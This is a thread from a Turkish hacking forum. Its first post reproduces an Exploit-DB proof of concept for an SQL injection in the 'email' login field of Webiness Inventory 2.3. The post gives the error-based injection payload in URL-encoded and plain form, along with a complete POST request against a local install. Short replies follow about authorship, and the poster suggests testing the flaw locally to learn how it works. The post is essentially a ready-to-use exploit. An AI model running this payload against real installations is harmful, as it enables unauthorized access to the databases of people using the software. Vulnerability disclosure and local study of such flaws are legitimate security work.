İPUCU

Exploitler Exploit Nedir ? Nasıl Kullanılır Ve Yeni Çıkan Exploitler Hakkında Bilgi ...

Seçenekler

Webiness Inventory 2.3 - 'email' SQL Vulnerability

14-02-2019 01:05
#1
Kacamax - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
04/2012
Nereden:
Sivas / 58
Yaş:
30
Mesajlar:
655
Teşekkür (Etti):
167
Teşekkür (Aldı):
66
Konular:
190
# Exploit Title / Exploit Basligi: Webiness Inventory 2.3 - 'email' SQL Vulnerability
# Dork: N/A
# Date / Tarih: 10-02-2019
# Author / Ekleyen: Mehmet EMIROGLU
# Vendor Homepage / Yapimcinin Sayfası: https://sourceforge.net/projects/web...ventory/files/
# Software Link / Yazilimin Linki: hhttps://sourceforge.net/projects/webinessinventory/files/
# Version / Versiyon: 2.3
# Category / Kategori: Webapps
# Test edilen isletim sistemi: Wamp64, Windows
# CVE: N/A
# Software Description / Yazılım Açıklaması: Web için küçük stok envanter yönetimi uygulaması.

# POC - SQL
# Parameters / Parametreler: email
# Attack Pattern / Saldiri Türü:

-1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1) %3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2 cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHA R(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR( 97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_S CHEMA.COLLATIONS+GROUP+BY+x)a)%2b%27

# POST Gönderme:
http://localhost/webiness/index.php?...=Wsauth/login/[SQL]
# https://i.hizliresim.com/ADObQ7.jpg
=============================================
POST /webiness/index.php?request=Wsauth/login/ HTTP/1.1
Host: localhost
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 458
Content-Type: multipart/form-data; boundary=54a535315dda429db2f07895827ff1c6
Cookie: PHPSESSID=6e5836p7djilmbh3bunro0ohu0
Referer: http://localhost/webiness/
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/54.0.2840.99 Safari/537.36

--54a535315dda429db2f07895827ff1c6
Content-Disposition: form-data; name="email"

-1' and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT
COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52 ),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109 ),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x
FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
--54a535315dda429db2f07895827ff1c6
Content-Disposition: form-data; name="password"

--54a535315dda429db2f07895827ff1c6--


Exploit Adresi: https://www.exploit-db.com/exploits/46350
Kullanıcı İmzası
“Bir soru sorulduğunda sorudan çok sana soruyu soranı tanımaya çalış”
Konu The CrueL tarafından (14-02-2019 01:33 Saat 01:33 ) değiştirilmiştir.

14-02-2019 01:06
#2
versen5656 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
02/2015
Mesajlar:
3.321
Teşekkür (Etti):
10
Teşekkür (Aldı):
354
Konular:
68
kendinmi yzdın yoksa alıntımı biraz karmaşık olmuş dost k.b ma çünkü diğer arkadaşlar için açıklama gerekir bence
Kullanıcı İmzası
10101010101010100101010100000101010101
1111 0000 1111 000 111 000 11100 11111 00000 1111 0000 000111 188 177 191 178 185 184 186 187 192 193 190 178 179 175 176 194 195 196 197
101010101010101010100101
14-02-2019 01:39
#3
Kacamax - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
04/2012
Nereden:
Sivas / 58
Yaş:
30
Mesajlar:
655
Teşekkür (Etti):
167
Teşekkür (Aldı):
66
Konular:
190
Alıntı:
versen5656´isimli üyeden Alıntı Mesajı göster
kendinmi yzdın yoksa alıntımı biraz karmaşık olmuş dost k.b ma çünkü diğer arkadaşlar için açıklama gerekir bence
Exploit yazari hem Türkce hemde ingilizce olarak zaten belirttim.
Aciik bulunan Versiyonun Yazilim linkide yukarda mevcut.Exploitleri paylasmadan önce benim yaptigim gibi sizde Indirip Local'de kurarak belirtilen sekilde acigi uygulaya bilirsiniz.
Hem böylece Mantiginida kavramis olursunuz
Kullanıcı İmzası
“Bir soru sorulduğunda sorudan çok sana soruyu soranı tanımaya çalış”

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı